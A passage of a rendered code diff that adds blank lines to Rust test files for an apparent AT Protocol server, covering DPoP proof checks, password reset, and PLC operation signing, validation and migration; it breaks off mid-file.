#[test] 1435 fn test_jwk_thumbprint_missing_crv() { 1436 let jwk = DPoPJwk { ··· 1442 let thumbprint = compute_jwk_thumbprint(&jwk); 1443 assert!(thumbprint.is_err()); 1444 } 1445 + 1446 #[test] 1447 fn test_jwk_thumbprint_missing_x() { 1448 let jwk = DPoPJwk { ··· 1454 let thumbprint = compute_jwk_thumbprint(&jwk); 1455 assert!(thumbprint.is_err()); 1456 } 1457 + 1458 #[test] 1459 fn test_jwk_thumbprint_missing_y_for_ec() { 1460 let jwk = DPoPJwk { ··· 1466 let thumbprint = compute_jwk_thumbprint(&jwk); 1467 assert!(thumbprint.is_err()); 1468 } 1469 + 1470 #[test] 1471 fn test_jwk_thumbprint_unsupported_key_type() { 1472 let jwk = DPoPJwk { ··· 1478 let thumbprint = compute_jwk_thumbprint(&jwk); 1479 assert!(thumbprint.is_err()); 1480 } 1481 + 1482 #[test] 1483 fn test_jwk_thumbprint_deterministic() { 1484 let jwk = DPoPJwk { ··· 1491 let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 1492 assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 1493 } 1494 + 1495 #[test] 1496 fn test_dpop_proof_invalid_format() { 1497 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1501 let result = verifier.verify_proof("invalid", "POST", "https://example.com", None); 1502 assert!(result.is_err()); 1503 } 1504 + 1505 #[test] 1506 fn test_dpop_proof_invalid_typ() { 1507 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1528 let result = verifier.verify_proof(&proof, "POST", "https://example.com", None); 1529 assert!(result.is_err()); 1530 } 1531 + 1532 #[test] 1533 fn test_dpop_proof_method_mismatch() { 1534 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1537 let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None); 1538 assert!(result.is_err()); 1539 } 1540 + 1541 #[test] 1542 fn test_dpop_proof_uri_mismatch() { 1543 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1546 let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None); 1547 assert!(result.is_err()); 1548 } 1549 + 1550 #[test] 1551 fn test_dpop_proof_iat_too_old() { 1552 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1555 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1556 assert!(result.is_err()); 1557 } 1558 + 1559 #[test] 1560 fn test_dpop_proof_iat_future() { 1561 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1564 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1565 assert!(result.is_err()); 1566 } 1567 + 1568 #[test] 1569 fn test_dpop_proof_ath_mismatch() { 1570 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1584 ); 1585 assert!(result.is_err()); 1586 } 1587 + 1588 #[test] 1589 fn test_dpop_proof_missing_ath_when_required() { 1590 let secret = b"test-dpop-secret-32-bytes-long!!"; ··· 1598 ); 1599 assert!(result.is_err()); 1600 } 1601 + 1602 #[test] 1603 fn test_dpop_proof_uri_ignores_query_params() { 1604 let secret = b"test-dpop-secret-32-bytes-long!!";
+9
tests/password_reset.rs
··· 4 use serde_json::{json, Value}; 5 use sqlx::PgPool; 6 use helpers::verify_new_account; 7 async fn get_pool() -> PgPool { 8 let conn_str = common::get_db_connection_string().await; 9 sqlx::postgres::PgPoolOptions::new() ··· 12 .await 13 .expect("Failed to connect to test database") 14 } 15 #[tokio::test] 16 async fn test_request_password_reset_creates_code() { 17 let client = common::client(); ··· 51 assert!(code.contains('-')); 52 assert_eq!(code.len(), 11); 53 } 54 #[tokio::test] 55 async fn test_request_password_reset_unknown_email_returns_ok() { 56 let client = common::client(); ··· 63 .expect("Failed to request password reset"); 64 assert_eq!(res.status(), StatusCode::OK); 65 } 66 #[tokio::test] 67 async fn test_reset_password_with_valid_token() { 68 let client = common::client(); ··· 142 .expect("Failed to login attempt"); 143 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 144 } 145 #[tokio::test] 146 async fn test_reset_password_with_invalid_token() { 147 let client = common::client(); ··· 159 let body: Value = res.json().await.expect("Invalid JSON"); 160 assert_eq!(body["error"], "InvalidToken"); 161 } 162 #[tokio::test] 163 async fn test_reset_password_with_expired_token() { 164 let client = common::client(); ··· 213 let body: Value = res.json().await.expect("Invalid JSON"); 214 assert_eq!(body["error"], "ExpiredToken"); 215 } 216 #[tokio::test] 217 async fn test_reset_password_invalidates_sessions() { 218 let client = common::client(); ··· 275 .expect("Failed to get session"); 276 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 277 } 278 #[tokio::test] 279 async fn test_request_password_reset_empty_email() { 280 let client = common::client(); ··· 289 let body: Value = res.json().await.expect("Invalid JSON"); 290 assert_eq!(body["error"], "InvalidRequest"); 291 } 292 #[tokio::test] 293 async fn test_reset_password_creates_notification() { 294 let pool = get_pool().await;
··· 4 use serde_json::{json, Value}; 5 use sqlx::PgPool; 6 use helpers::verify_new_account; 7 + 8 async fn get_pool() -> PgPool { 9 let conn_str = common::get_db_connection_string().await; 10 sqlx::postgres::PgPoolOptions::new() ··· 13 .await 14 .expect("Failed to connect to test database") 15 } 16 + 17 #[tokio::test] 18 async fn test_request_password_reset_creates_code() { 19 let client = common::client(); ··· 53 assert!(code.contains('-')); 54 assert_eq!(code.len(), 11); 55 } 56 + 57 #[tokio::test] 58 async fn test_request_password_reset_unknown_email_returns_ok() { 59 let client = common::client(); ··· 66 .expect("Failed to request password reset"); 67 assert_eq!(res.status(), StatusCode::OK); 68 } 69 + 70 #[tokio::test] 71 async fn test_reset_password_with_valid_token() { 72 let client = common::client(); ··· 146 .expect("Failed to login attempt"); 147 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 148 } 149 + 150 #[tokio::test] 151 async fn test_reset_password_with_invalid_token() { 152 let client = common::client(); ··· 164 let body: Value = res.json().await.expect("Invalid JSON"); 165 assert_eq!(body["error"], "InvalidToken"); 166 } 167 + 168 #[tokio::test] 169 async fn test_reset_password_with_expired_token() { 170 let client = common::client(); ··· 219 let body: Value = res.json().await.expect("Invalid JSON"); 220 assert_eq!(body["error"], "ExpiredToken"); 221 } 222 + 223 #[tokio::test] 224 async fn test_reset_password_invalidates_sessions() { 225 let client = common::client(); ··· 282 .expect("Failed to get session"); 283 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 284 } 285 + 286 #[tokio::test] 287 async fn test_request_password_reset_empty_email() { 288 let client = common::client(); ··· 297 let body: Value = res.json().await.expect("Invalid JSON"); 298 assert_eq!(body["error"], "InvalidRequest"); 299 } 300 + 301 #[tokio::test] 302 async fn test_reset_password_creates_notification() { 303 let pool = get_pool().await;
+20
tests/plc_migration.rs
··· 6 use sqlx::PgPool; 7 use wiremock::matchers::{method, path}; 8 use wiremock::{Mock, MockServer, ResponseTemplate}; 9 fn encode_uvarint(mut x: u64) -> Vec<u8> { 10 let mut out = Vec::new(); 11 while x >= 0x80 { ··· 15 out.push(x as u8); 16 out 17 } 18 fn signing_key_to_did_key(signing_key: &SigningKey) -> String { 19 let verifying_key = signing_key.verifying_key(); 20 let point = verifying_key.to_encoded_point(true); ··· 24 let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed); 25 format!("did:key:{}", encoded) 26 } 27 fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String { 28 let public_key = signing_key.verifying_key(); 29 let compressed = public_key.to_sec1_bytes(); ··· 31 buf.extend_from_slice(&compressed); 32 multibase::encode(multibase::Base::Base58Btc, buf) 33 } 34 async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> { 35 let db_url = get_db_connection_string().await; 36 let pool = PgPool::connect(&db_url).await.ok()?; ··· 48 .ok()??; 49 bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok() 50 } 51 async fn get_plc_token_from_db(did: &str) -> Option<String> { 52 let db_url = get_db_connection_string().await; 53 let pool = PgPool::connect(&db_url).await.ok()?; ··· 64 .await 65 .ok()? 66 } 67 async fn get_user_handle(did: &str) -> Option<String> { 68 let db_url = get_db_connection_string().await; 69 let pool = PgPool::connect(&db_url).await.ok()?; ··· 75 .await 76 .ok()? 77 } 78 fn create_mock_last_op( 79 _did: &str, 80 handle: &str, ··· 99 "sig": "mock_signature_for_testing" 100 }) 101 } 102 fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value { 103 let multikey = get_multikey_from_signing_key(signing_key); 104 json!({ ··· 121 }] 122 }) 123 } 124 async fn setup_mock_plc_for_sign( 125 did: &str, 126 handle: &str, ··· 137 .await; 138 mock_server 139 } 140 async fn setup_mock_plc_for_submit( 141 did: &str, 142 handle: &str, ··· 158 .await; 159 mock_server 160 } 161 #[tokio::test] 162 #[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"] 163 async fn test_full_plc_operation_flow() { ··· 213 assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation")); 214 assert!(operation.get("prev").is_some(), "Operation should have prev reference"); 215 } 216 #[tokio::test] 217 #[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"] 218 async fn test_sign_plc_operation_consumes_token() { ··· 278 "Error should indicate invalid/expired token" 279 ); 280 } 281 #[tokio::test] 282 async fn test_sign_plc_operation_with_custom_fields() { 283 let client = client(); ··· 337 assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases"); 338 assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys"); 339 } 340 #[tokio::test] 341 #[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"] 342 async fn test_submit_plc_operation_success() { ··· 390 submit_body 391 ); 392 } 393 #[tokio::test] 394 async fn test_submit_plc_operation_wrong_endpoint_rejected() { 395 let client = client(); ··· 441 let body: Value = submit_res.json().await.unwrap(); 442 assert_eq!(body["error"], "InvalidRequest"); 443 } 444 #[tokio::test] 445 async fn test_submit_plc_operation_wrong_signing_key_rejected() { 446 let client = client(); ··· 494 let body: Value = submit_res.json().await.unwrap(); 495 assert_eq!(body["error"], "InvalidRequest"); 496 } 497 #[tokio::test] 498 async fn test_full_sign_and_submit_flow() { 499 let client = client(); ··· 593 submit_body 594 ); 595 } 596 #[tokio::test] 597 async fn test_cross_pds_migration_with_records() { 598 let client = client(); ··· 692 "Record content should match" 693 ); 694 } 695 #[tokio::test] 696 async fn test_migration_rejects_wrong_did_document() { 697 let client = client(); ··· 749 "Error should mention signature verification failure" 750 ); 751 } 752 #[tokio::test] 753 #[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"] 754 async fn test_full_migration_flow_end_to_end() {
··· 6 use sqlx::PgPool; 7 use wiremock::matchers::{method, path}; 8 use wiremock::{Mock, MockServer, ResponseTemplate}; 9 + 10 fn encode_uvarint(mut x: u64) -> Vec<u8> { 11 let mut out = Vec::new(); 12 while x >= 0x80 { ··· 16 out.push(x as u8); 17 out 18 } 19 + 20 fn signing_key_to_did_key(signing_key: &SigningKey) -> String { 21 let verifying_key = signing_key.verifying_key(); 22 let point = verifying_key.to_encoded_point(true); ··· 26 let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed); 27 format!("did:key:{}", encoded) 28 } 29 + 30 fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String { 31 let public_key = signing_key.verifying_key(); 32 let compressed = public_key.to_sec1_bytes(); ··· 34 buf.extend_from_slice(&compressed); 35 multibase::encode(multibase::Base::Base58Btc, buf) 36 } 37 + 38 async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> { 39 let db_url = get_db_connection_string().await; 40 let pool = PgPool::connect(&db_url).await.ok()?; ··· 52 .ok()??; 53 bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok() 54 } 55 + 56 async fn get_plc_token_from_db(did: &str) -> Option<String> { 57 let db_url = get_db_connection_string().await; 58 let pool = PgPool::connect(&db_url).await.ok()?; ··· 69 .await 70 .ok()? 71 } 72 + 73 async fn get_user_handle(did: &str) -> Option<String> { 74 let db_url = get_db_connection_string().await; 75 let pool = PgPool::connect(&db_url).await.ok()?; ··· 81 .await 82 .ok()? 83 } 84 + 85 fn create_mock_last_op( 86 _did: &str, 87 handle: &str, ··· 106 "sig": "mock_signature_for_testing" 107 }) 108 } 109 + 110 fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value { 111 let multikey = get_multikey_from_signing_key(signing_key); 112 json!({ ··· 129 }] 130 }) 131 } 132 + 133 async fn setup_mock_plc_for_sign( 134 did: &str, 135 handle: &str, ··· 146 .await; 147 mock_server 148 } 149 + 150 async fn setup_mock_plc_for_submit( 151 did: &str, 152 handle: &str, ··· 168 .await; 169 mock_server 170 } 171 + 172 #[tokio::test] 173 #[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"] 174 async fn test_full_plc_operation_flow() { ··· 224 assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation")); 225 assert!(operation.get("prev").is_some(), "Operation should have prev reference"); 226 } 227 + 228 #[tokio::test] 229 #[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"] 230 async fn test_sign_plc_operation_consumes_token() { ··· 290 "Error should indicate invalid/expired token" 291 ); 292 } 293 + 294 #[tokio::test] 295 async fn test_sign_plc_operation_with_custom_fields() { 296 let client = client(); ··· 350 assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases"); 351 assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys"); 352 } 353 + 354 #[tokio::test] 355 #[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"] 356 async fn test_submit_plc_operation_success() { ··· 404 submit_body 405 ); 406 } 407 + 408 #[tokio::test] 409 async fn test_submit_plc_operation_wrong_endpoint_rejected() { 410 let client = client(); ··· 456 let body: Value = submit_res.json().await.unwrap(); 457 assert_eq!(body["error"], "InvalidRequest"); 458 } 459 + 460 #[tokio::test] 461 async fn test_submit_plc_operation_wrong_signing_key_rejected() { 462 let client = client(); ··· 510 let body: Value = submit_res.json().await.unwrap(); 511 assert_eq!(body["error"], "InvalidRequest"); 512 } 513 + 514 #[tokio::test] 515 async fn test_full_sign_and_submit_flow() { 516 let client = client(); ··· 610 submit_body 611 ); 612 } 613 + 614 #[tokio::test] 615 async fn test_cross_pds_migration_with_records() { 616 let client = client(); ··· 710 "Record content should match" 711 ); 712 } 713 + 714 #[tokio::test] 715 async fn test_migration_rejects_wrong_did_document() { 716 let client = client(); ··· 768 "Error should mention signature verification failure" 769 ); 770 } 771 + 772 #[tokio::test] 773 #[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"] 774 async fn test_full_migration_flow_end_to_end() {
+15
tests/plc_operations.rs
··· 3 use reqwest::StatusCode; 4 use serde_json::json; 5 use sqlx::PgPool; 6 #[tokio::test] 7 async fn test_request_plc_operation_signature_requires_auth() { 8 let client = client(); ··· 16 .expect("Request failed"); 17 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 18 } 19 #[tokio::test] 20 async fn test_request_plc_operation_signature_success() { 21 let client = client(); ··· 31 .expect("Request failed"); 32 assert_eq!(res.status(), StatusCode::OK); 33 } 34 #[tokio::test] 35 async fn test_sign_plc_operation_requires_auth() { 36 let client = client(); ··· 45 .expect("Request failed"); 46 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 47 } 48 #[tokio::test] 49 async fn test_sign_plc_operation_requires_token() { 50 let client = client(); ··· 63 let body: serde_json::Value = res.json().await.unwrap(); 64 assert_eq!(body["error"], "InvalidRequest"); 65 } 66 #[tokio::test] 67 async fn test_sign_plc_operation_invalid_token() { 68 let client = client(); ··· 83 let body: serde_json::Value = res.json().await.unwrap(); 84 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); 85 } 86 #[tokio::test] 87 async fn test_submit_plc_operation_requires_auth() { 88 let client = client(); ··· 99 .expect("Request failed"); 100 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 101 } 102 #[tokio::test] 103 async fn test_submit_plc_operation_invalid_operation() { 104 let client = client(); ··· 121 let body: serde_json::Value = res.json().await.unwrap(); 122 assert_eq!(body["error"], "InvalidRequest"); 123 } 124 #[tokio::test] 125 async fn test_submit_plc_operation_missing_sig() { 126 let client = client(); ··· 148 let body: serde_json::Value = res.json().await.unwrap(); 149 assert_eq!(body["error"], "InvalidRequest"); 150 } 151 #[tokio::test] 152 async fn test_submit_plc_operation_wrong_service_endpoint() { 153 let client = client(); ··· 179 .expect("Request failed"); 180 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 181 } 182 #[tokio::test] 183 async fn test_request_plc_operation_creates_token_in_db() { 184 let client = client(); ··· 213 assert!(row.token.contains('-'), "Token should contain hyphen"); 214 assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 215 } 216 #[tokio::test] 217 async fn test_request_plc_operation_replaces_existing_token() { 218 let client = client(); ··· 278 .expect("Count query failed"); 279 assert_eq!(count, 1, "Should only have one token per user"); 280 } 281 #[tokio::test] 282 async fn test_submit_plc_operation_wrong_verification_method() { 283 let client = client(); ··· 321 body 322 ); 323 } 324 #[tokio::test] 325 async fn test_submit_plc_operation_wrong_handle() { 326 let client = client(); ··· 357 let body: serde_json::Value = res.json().await.unwrap(); 358 assert_eq!(body["error"], "InvalidRequest"); 359 } 360 #[tokio::test] 361 async fn test_submit_plc_operation_wrong_service_type() { 362 let client = client(); ··· 393 let body: serde_json::Value = res.json().await.unwrap(); 394 assert_eq!(body["error"], "InvalidRequest"); 395 } 396 #[tokio::test] 397 async fn test_plc_token_expiry_format() { 398 let client = client();
··· 3 use reqwest::StatusCode; 4 use serde_json::json; 5 use sqlx::PgPool; 6 + 7 #[tokio::test] 8 async fn test_request_plc_operation_signature_requires_auth() { 9 let client = client(); ··· 17 .expect("Request failed"); 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 19 } 20 + 21 #[tokio::test] 22 async fn test_request_plc_operation_signature_success() { 23 let client = client(); ··· 33 .expect("Request failed"); 34 assert_eq!(res.status(), StatusCode::OK); 35 } 36 + 37 #[tokio::test] 38 async fn test_sign_plc_operation_requires_auth() { 39 let client = client(); ··· 48 .expect("Request failed"); 49 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 50 } 51 + 52 #[tokio::test] 53 async fn test_sign_plc_operation_requires_token() { 54 let client = client(); ··· 67 let body: serde_json::Value = res.json().await.unwrap(); 68 assert_eq!(body["error"], "InvalidRequest"); 69 } 70 + 71 #[tokio::test] 72 async fn test_sign_plc_operation_invalid_token() { 73 let client = client(); ··· 88 let body: serde_json::Value = res.json().await.unwrap(); 89 assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken"); 90 } 91 + 92 #[tokio::test] 93 async fn test_submit_plc_operation_requires_auth() { 94 let client = client(); ··· 105 .expect("Request failed"); 106 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 107 } 108 + 109 #[tokio::test] 110 async fn test_submit_plc_operation_invalid_operation() { 111 let client = client(); ··· 128 let body: serde_json::Value = res.json().await.unwrap(); 129 assert_eq!(body["error"], "InvalidRequest"); 130 } 131 + 132 #[tokio::test] 133 async fn test_submit_plc_operation_missing_sig() { 134 let client = client(); ··· 156 let body: serde_json::Value = res.json().await.unwrap(); 157 assert_eq!(body["error"], "InvalidRequest"); 158 } 159 + 160 #[tokio::test] 161 async fn test_submit_plc_operation_wrong_service_endpoint() { 162 let client = client(); ··· 188 .expect("Request failed"); 189 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 190 } 191 + 192 #[tokio::test] 193 async fn test_request_plc_operation_creates_token_in_db() { 194 let client = client(); ··· 223 assert!(row.token.contains('-'), "Token should contain hyphen"); 224 assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired"); 225 } 226 + 227 #[tokio::test] 228 async fn test_request_plc_operation_replaces_existing_token() { 229 let client = client(); ··· 289 .expect("Count query failed"); 290 assert_eq!(count, 1, "Should only have one token per user"); 291 } 292 + 293 #[tokio::test] 294 async fn test_submit_plc_operation_wrong_verification_method() { 295 let client = client(); ··· 333 body 334 ); 335 } 336 + 337 #[tokio::test] 338 async fn test_submit_plc_operation_wrong_handle() { 339 let client = client(); ··· 370 let body: serde_json::Value = res.json().await.unwrap(); 371 assert_eq!(body["error"], "InvalidRequest"); 372 } 373 + 374 #[tokio::test] 375 async fn test_submit_plc_operation_wrong_service_type() { 376 let client = client(); ··· 407 let body: serde_json::Value = res.json().await.unwrap(); 408 assert_eq!(body["error"], "InvalidRequest"); 409 } 410 + 411 #[tokio::test] 412 async fn test_plc_token_expiry_format() { 413 let client = client();
+29
tests/plc_validation.rs
··· 7 use k256::ecdsa::SigningKey; 8 use serde_json::json; 9 use std::collections::HashMap; 10 fn create_valid_operation() -> serde_json::Value { 11 let key = SigningKey::random(&mut rand::thread_rng()); 12 let did_key = signing_key_to_did_key(&key); ··· 27 }); 28 sign_operation(&op, &key).unwrap() 29 } 30 #[test] 31 fn test_validate_plc_operation_valid() { 32 let op = create_valid_operation(); 33 let result = validate_plc_operation(&op); 34 assert!(result.is_ok()); 35 } 36 #[test] 37 fn test_validate_plc_operation_missing_type() { 38 let op = json!({ ··· 45 let result = validate_plc_operation(&op); 46 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 47 } 48 #[test] 49 fn test_validate_plc_operation_invalid_type() { 50 let op = json!({ ··· 54 let result = validate_plc_operation(&op); 55 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 56 } 57 #[test] 58 fn test_validate_plc_operation_missing_sig() { 59 let op = json!({ ··· 66 let result = validate_plc_operation(&op); 67 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 68 } 69 #[test] 70 fn test_validate_plc_operation_missing_rotation_keys() { 71 let op = json!({ ··· 78 let result = validate_plc_operation(&op); 79 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 80 } 81 #[test] 82 fn test_validate_plc_operation_missing_verification_methods() { 83 let op = json!({ ··· 90 let result = validate_plc_operation(&op); 91 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 92 } 93 #[test] 94 fn test_validate_plc_operation_missing_also_known_as() { 95 let op = json!({ ··· 102 let result = validate_plc_operation(&op); 103 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 104 } 105 #[test] 106 fn test_validate_plc_operation_missing_services() { 107 let op = json!({ ··· 114 let result = validate_plc_operation(&op); 115 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 116 } 117 #[test] 118 fn test_validate_rotation_key_required() { 119 let key = SigningKey::random(&mut rand::thread_rng()); ··· 141 let result = validate_plc_operation_for_submission(&op, &ctx); 142 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 143 } 144 #[test] 145 fn test_validate_signing_key_match() { 146 let key = SigningKey::random(&mut rand::thread_rng()); ··· 168 let result = validate_plc_operation_for_submission(&op, &ctx); 169 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 170 } 171 #[test] 172 fn test_validate_handle_match() { 173 let key = SigningKey::random(&mut rand::thread_rng()); ··· 194 let result = validate_plc_operation_for_submission(&op, &ctx); 195 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 196 } 197 #[test] 198 fn test_validate_pds_service_type() { 199 let key = SigningKey::random(&mut rand::thread_rng()); ··· 220 let result = validate_plc_operation_for_submission(&op, &ctx); 221 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 222 } 223 #[test] 224 fn test_validate_pds_endpoint_match() { 225 let key = SigningKey::random(&mut rand::thread_rng()); ··· 246 let result = validate_plc_operation_for_submission(&op, &ctx); 247 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 248 } 249 #[test] 250 fn test_verify_signature_secp256k1() { 251 let key = SigningKey::random(&mut rand::thread_rng()); ··· 264 assert!(result.is_ok()); 265 assert!(result.unwrap()); 266 } 267 #[test] 268 fn test_verify_signature_wrong_key() { 269 let key = SigningKey::random(&mut rand::thread_rng()); ··· 283 assert!(result.is_ok()); 284 assert!(!result.unwrap()); 285 } 286 #[test] 287 fn test_verify_signature_invalid_did_key_format() { 288 let key = SigningKey::random(&mut rand::thread_rng()); ··· 300 assert!(result.is_ok()); 301 assert!(!result.unwrap()); 302 } 303 #[test] 304 fn test_tombstone_validation() { 305 let op = json!({ ··· 310 let result = validate_plc_operation(&op); 311 assert!(result.is_ok()); 312 } 313 #[test] 314 fn test_cid_for_cbor_deterministic() { 315 let value = json!({ ··· 321 assert_eq!(cid1, cid2, "CID generation should be deterministic"); 322 assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)"); 323 } 324 #[test] 325 fn test_cid_different_for_different_data() { 326 let value1 = json!({"data": 1}); ··· 329 let cid2 = cid_for_cbor(&value2).unwrap(); 330 assert_ne!(cid1, cid2, "Different data should produce different CIDs"); 331 } 332 #[test] 333 fn test_signing_key_to_did_key_format() { 334 let key = SigningKey::random(&mut rand::thread_rng()); ··· 336 assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z"); 337 assert!(did_key.len() > 50, "Did key should be reasonably long"); 338 } 339 #[test] 340 fn test_signing_key_to_did_key_unique() { 341 let key1 = SigningKey::random(&mut rand::thread_rng()); ··· 344 let did2 = signing_key_to_did_key(&key2); 345 assert_ne!(did1, did2, "Different keys should produce different did:keys"); 346 } 347 #[test] 348 fn test_signing_key_to_did_key_consistent() { 349 let key = SigningKey::random(&mut rand::thread_rng()); ··· 351 let did2 = signing_key_to_did_key(&key); 352 assert_eq!(did1, did2, "Same key should produce same did:key"); 353 } 354 #[test] 355 fn test_sign_operation_removes_existing_sig() { 356 let key = SigningKey::random(&mut rand::thread_rng()); ··· 367 let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap(); 368 assert_ne!(new_sig, "old_signature", "Should replace old signature"); 369 } 370 #[test] 371 fn test_validate_plc_operation_not_object() { 372 let result = validate_plc_operation(&json!("not an object")); 373 assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 374 } 375 #[test] 376 fn test_validate_for_submission_tombstone_passes() { 377 let key = SigningKey::random(&mut rand::thread_rng()); ··· 390 let result = validate_plc_operation_for_submission(&op, &ctx); 391 assert!(result.is_ok(), "Tombstone should pass submission validation"); 392 } 393 #[test] 394 fn test_verify_signature_missing_sig() { 395 let op = json!({ ··· 402 let result = verify_operation_signature(&op, &[]); 403 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 404 } 405 #[test] 406 fn test_verify_signature_invalid_base64() { 407 let op = json!({ ··· 415 let result = verify_operation_signature(&op, &[]); 416 assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 417 } 418 #[test] 419 fn test_plc_operation_struct() { 420 let mut services = HashMap::new();
··· 7 use k256::ecdsa::SigningKey; 8 use serde_json::json; 9 use std::collections::HashMap; 10 + 11 fn create_valid_operation() -> serde_json::Value { 12 let key = SigningKey::random(&mut rand::thread_rng()); 13 let did_key = signing_key_to_did_key(&key); ··· 28 }); 29 sign_operation(&op, &key).unwrap() 30 } 31 + 32 #[test] 33 fn test_validate_plc_operation_valid() { 34 let op = create_valid_operation(); 35 let result = validate_plc_operation(&op); 36 assert!(result.is_ok()); 37 } 38 + 39 #[test] 40 fn test_validate_plc_operation_missing_type() { 41 let op = json!({ ··· 48 let result = validate_plc_operation(&op); 49 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 50 } 51 + 52 #[test] 53 fn test_validate_plc_operation_invalid_type() { 54 let op = json!({ ··· 58 let result = validate_plc_operation(&op); 59 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 60 } 61 + 62 #[test] 63 fn test_validate_plc_operation_missing_sig() { 64 let op = json!({ ··· 71 let result = validate_plc_operation(&op); 72 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 73 } 74 + 75 #[test] 76 fn test_validate_plc_operation_missing_rotation_keys() { 77 let op = json!({ ··· 84 let result = validate_plc_operation(&op); 85 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 86 } 87 + 88 #[test] 89 fn test_validate_plc_operation_missing_verification_methods() { 90 let op = json!({ ··· 97 let result = validate_plc_operation(&op); 98 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 99 } 100 + 101 #[test] 102 fn test_validate_plc_operation_missing_also_known_as() { 103 let op = json!({ ··· 110 let result = validate_plc_operation(&op); 111 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 112 } 113 + 114 #[test] 115 fn test_validate_plc_operation_missing_services() { 116 let op = json!({ ··· 123 let result = validate_plc_operation(&op); 124 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 125 } 126 + 127 #[test] 128 fn test_validate_rotation_key_required() { 129 let key = SigningKey::random(&mut rand::thread_rng()); ··· 151 let result = validate_plc_operation_for_submission(&op, &ctx); 152 assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 153 } 154 + 155 #[test] 156 fn test_validate_signing_key_match() { 157 let key = SigningKey::random(&mut rand::thread_rng()); ··· 179 let result = validate_plc_operation_for_submission(&op, 